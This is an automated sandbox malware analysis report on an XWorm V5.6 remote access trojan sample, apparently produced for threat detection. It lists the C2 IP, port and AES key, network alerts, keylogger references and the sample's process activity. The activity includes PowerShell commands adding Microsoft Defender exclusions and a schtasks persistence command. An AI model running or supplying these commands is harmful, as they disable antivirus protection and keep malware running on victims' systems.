Source: C:\Users\user\AppData\Roaming\SystemUser32.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: 5q4X9fRo4b.exe | Malware Configuration Extractor: Xworm {"C2 url": ["147.185.221.17"], "Port": "10406", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: C:\Users\user\AppData\Roaming\SystemUser32.exe | ReversingLabs: Detection: 84%
Source: 5q4X9fRo4b.exe | ReversingLabs: Detection: 84%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\SystemUser32.exe | Joe Sandbox ML: detected
Source: 5q4X9fRo4b.exe | Joe Sandbox ML: detected
Source: 5q4X9fRo4b.exe | String decryptor: 147.185.221.17
Source: 5q4X9fRo4b.exe | String decryptor: 10406
Source: 5q4X9fRo4b.exe | String decryptor: <123456789>
Source: 5q4X9fRo4b.exe | String decryptor: <Xwormmm>
Source: 5q4X9fRo4b.exe | String decryptor: XWorm V5.6
Source: 5q4X9fRo4b.exe | String decryptor: USB.exe
Source: 5q4X9fRo4b.exe | String decryptor: %AppData%
Source: 5q4X9fRo4b.exe | String decryptor: SystemUser32.exe
Source: 5q4X9fRo4b.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 5q4X9fRo4b.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Networking

Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.185.221.17:10406 -> 192.168.2.7:49933
Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 147.185.221.17:10406 -> 192.168.2.7:49933
Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49933 -> 147.185.221.17:10406
Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49933 -> 147.185.221.17:10406
Source: Malware configuration extractor | URLs: 147.185.221.17
Source: Yara match | File source: 5q4X9fRo4b.exe, type: SAMPLE
Source: Yara match | File source: 0.0.5q4X9fRo4b.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Roaming\SystemUser32.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.7:49933 -> 147.185.221.17:10406
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | ASN Name: TUT-ASUS
Source: Joe Sandbox View | ASN Name: SALSGIVERUS
Source: unknown | DNS query: name: ip-api.com
Source: unknown | TCP traffic detected without corresponding DNS query: 147.185.221.17 (reported 18 times)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: powershell.exe, 0000000C.00000002.1436589079.0000022BB15AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mQo
Source: 5q4X9fRo4b.exe, SystemUser32.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000008.00000002.1333269390.000001C8ED9C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1422781549.0000022BA8EF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1565537713.0000024CB0050000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.1340691881.000001C8F5FF0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mic5d
Source: powershell.exe, 00000008.00000002.1318985953.000001C8DDB79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1371602154.0000022B990A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1471528243.0000024CA020A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 5q4X9fRo4b.exe, 00000000.00000002.2502473225.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1318985953.000001C8DD951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1371602154.0000022B98E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1471528243.0000024C9FFE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1626793015.000001C92E101000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.1318985953.000001C8DDB79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1371602154.0000022B990A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1471528243.0000024CA020A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000C.00000002.1436589079.0000022BB15AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://wwoft.com/pki/cert
Source: powershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.1341620056.000001C8F619F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.coU
Source: powershell.exe, 00000008.00000002.1318985953.000001C8DD951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1371602154.0000022B98E81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1471528243.0000024C9FFE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1626793015.000001C92E101000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000011.00000002.1626793015.000001C92E329000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.1578558760.0000024CB8384000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000008.00000002.1333269390.000001C8ED9C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1422781549.0000022BA8EF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1565537713.0000024CB0050000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1748255639.000001C93E16E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            Source: Yara match File source: 5q4X9fRo4b.exe, type: SAMPLE
                            Source: Yara match File source: 0.0.5q4X9fRo4b.exe.d30000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match File source: C:\Users\user\AppData\Roaming\SystemUser32.exe, type: DROPPED
                            Source: 5q4X9fRo4b.exe, XLogger.cs .Net Code: KeyboardLayout
                            Source: SystemUser32.exe.0.dr, XLogger.cs .Net Code: KeyboardLayout

                            Operating System Destruction

                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Process information set: 01 00 00 00

                            System Summary

                            Source: 5q4X9fRo4b.exe, type: SAMPLE Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 0.0.5q4X9fRo4b.exe.d30000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Code function: 0_2_00007FFAACCE155E
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Code function: 0_2_00007FFAACCE6A22
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Code function: 0_2_00007FFAACCE1F41
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Code function: 0_2_00007FFAACCE5C76
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Code function: 0_2_00007FFAACCEE9B8
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Code function: 0_2_00007FFAACCEA310
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Code function: 0_2_00007FFAACCE5779
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Code function: 0_2_00007FFAACCE1CA1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFAACDA30E9
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFAACDB30E9
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFAACDA30E9
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe Code function: 22_2_00007FFAACCD1CA1
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe Code function: 22_2_00007FFAACCD155E
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe Code function: 25_2_00007FFAACCD1CA1
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe Code function: 25_2_00007FFAACCD155E
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe Code function: 26_2_00007FFAACCB1CA1
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe Code function: 26_2_00007FFAACCB155E
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe Code function: 27_2_00007FFAACCD1CA1
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe Code function: 27_2_00007FFAACCD155E
                            Source: 5q4X9fRo4b.exe, 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameGenesisLoaderCracked.exe4 vs 5q4X9fRo4b.exe
                            Source: 5q4X9fRo4b.exe Binary or memory string: OriginalFilenameGenesisLoaderCracked.exe4 vs 5q4X9fRo4b.exe
                            Source: 5q4X9fRo4b.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 5q4X9fRo4b.exe, type: SAMPLE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.0.5q4X9fRo4b.exe.d30000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000000.00000000.1242257405.0000000000D32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe, type: DROPPED Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 5q4X9fRo4b.exe, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
                            Source: 5q4X9fRo4b.exe, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
                            Source: 5q4X9fRo4b.exe, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
                            Source: SystemUser32.exe.0.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
                            Source: SystemUser32.exe.0.dr, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
                            Source: SystemUser32.exe.0.dr, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
                            Source: SystemUser32.exe.0.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: SystemUser32.exe.0.dr, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 5q4X9fRo4b.exe, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 5q4X9fRo4b.exe, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@20/21@1/2
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe File created: C:\Users\user\AppData\Roaming\SystemUser32.exe
                            Source: C:\Users\user\AppData\Roaming\SystemUser32.exe Mutant created: NULL
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Mutant created: \Sessions\1\BaseNamedObjects\ONpGJYzGmp6SrVTn
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe File created: C:\Users\user\AppData\Local\Temp\Log.tmp
                            Source: 5q4X9fRo4b.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: 5q4X9fRo4b.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe File read: C:\Users\user\Desktop\desktop.ini
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: 5q4X9fRo4b.exe ReversingLabs: Detection: 84%
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe File read: C:\Users\user\Desktop\5q4X9fRo4b.exe
                            Source: unknown Process created: C:\Users\user\Desktop\5q4X9fRo4b.exe "C:\Users\user\Desktop\5q4X9fRo4b.exe"
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\5q4X9fRo4b.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '5q4X9fRo4b.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SystemUser32.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SystemUser32.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SystemUser32" /tr "C:\Users\user\AppData\Roaming\SystemUser32.exe"
                            Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknown Process created: C:\Users\user\AppData\Roaming\SystemUser32.exe C:\Users\user\AppData\Roaming\SystemUser32.exe
                            Source: unknown Process created: C:\Users\user\AppData\Roaming\SystemUser32.exe "C:\Users\user\AppData\Roaming\SystemUser32.exe"
                            Source: unknown Process created: C:\Users\user\AppData\Roaming\SystemUser32.exe C:\Users\user\AppData\Roaming\SystemUser32.exe
                            Source: unknown Process created: C:\Users\user\AppData\Roaming\SystemUser32.exe "C:\Users\user\AppData\Roaming\SystemUser32.exe"
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: apphelp.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: version.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: wbemcomn.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: amsi.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: userenv.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: profapi.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: wldp.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: rasapi32.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: rasman.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: rtutils.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: mswsock.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: winhttp.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: iphlpapi.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: dhcpcsvc.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: dnsapi.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: winnsi.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: rasadhlp.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: fwpuclnt.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: propsys.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: edputil.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: urlmon.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: iertutil.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: srvcli.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: netutils.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: wintypes.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: appresolver.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: bcp47langs.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: slc.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: sppc.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: sxs.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: mpr.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: scrrun.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: linkinfo.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: ntshrui.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: cscapi.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: avicap32.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: msvfw32.dll
                            Source: C:\Users\user\Desktop\5q4X9fRo4b.exe Section loaded: winmm.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
